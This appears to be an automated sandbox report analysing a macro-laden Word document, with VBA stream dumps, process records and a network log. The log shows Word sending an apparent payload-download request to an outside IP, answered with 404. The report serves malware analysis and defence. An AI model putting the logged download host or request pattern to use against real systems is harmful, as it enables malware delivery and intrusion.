                                                                                                                                                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                        Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                                        Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 2724
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/__SRP_3
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:2724
                                                                                                                                                        Entropy:2.7004238887086345
                                                                                                                                                        Base64 Encoded:False
                                                                                                                                                        Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ` . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . , . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . Q . P . . . . . . . . . . . . . \\ . . p
                                                                                                                                                        Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 60 00 c1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 10 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                        Stream Path: VBA/dir, File Type: data, Stream Size: 486
                                                                                                                                                        General
                                                                                                                                                        Stream Path:VBA/dir
                                                                                                                                                        File Type:data
                                                                                                                                                        Stream Size:486
                                                                                                                                                        Entropy:6.3067050501427175
                                                                                                                                                        Base64 Encoded:True
                                                                                                                                                        Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . @ d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A -
                                                                                                                                                        Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 d3 40 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30

                                                                                                                                                        Network Behavior

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Aug 11, 2022 18:58:45.151184082 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                        Aug 11, 2022 18:58:45.255310059 CEST804974145.8.146.139192.168.2.3
                                                                                                                                                        Aug 11, 2022 18:58:45.255506992 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                        Aug 11, 2022 18:58:45.272706032 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                        Aug 11, 2022 18:58:45.376708984 CEST804974145.8.146.139192.168.2.3
                                                                                                                                                        Aug 11, 2022 18:58:45.396755934 CEST804974145.8.146.139192.168.2.3
                                                                                                                                                        Aug 11, 2022 18:58:45.396877050 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                        Aug 11, 2022 18:58:50.402072906 CEST804974145.8.146.139192.168.2.3
                                                                                                                                                        Aug 11, 2022 18:58:50.402266979 CEST4974180192.168.2.345.8.146.139
                                                                                                                                                        Aug 11, 2022 18:59:23.421643019 CEST4974180192.168.2.345.8.146.139

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • 45.8.146.139

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.34974145.8.146.13980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Aug 11, 2022 18:58:45.272706032 CEST1179OUTGET /fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: 45.8.146.139
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Aug 11, 2022 18:58:45.396755934 CEST1180INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 11 Aug 2022 16:58:45 GMT
                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                                                                                        X-Powered-By: PHP/7.2.34
                                                                                                                                                        Content-Length: 201
                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 2d 66 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "-f" was not found on this server.</p></body></html>


                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:18:58:36
                                                                                                                                                        Start date:11/08/2022
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                        Imagebase:0x1390000
                                                                                                                                                        File size:1937688 bytes
                                                                                                                                                        MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Target ID:17
                                                                                                                                                        Start time:18:59:08
                                                                                                                                                        Start date:11/08/2022
                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 4128
                                                                                                                                                        Imagebase:0xbf0000
                                                                                                                                                        File size:434592 bytes
                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Target ID:18
                                                                                                                                                        Start time:18:59:08
                                                                                                                                                        Start date:11/08/2022
                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 4132
                                                                                                                                                        Imagebase:0xbf0000
                                                                                                                                                        File size:434592 bytes
                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis

                                                                                                                                                        Call Graph

                                                                                                                                                        • Entrypoint
                                                                                                                                                        • Decryption Function
                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        • Show Help
                                                                                                                                                        callgraph 1 Error: Graph is empty

                                                                                                                                                        Module: __Unknown_Module_Name__

                                                                                                                                                        Declaration
                                                                                                                                                        LineContent
                                                                                                                                                        Reset < >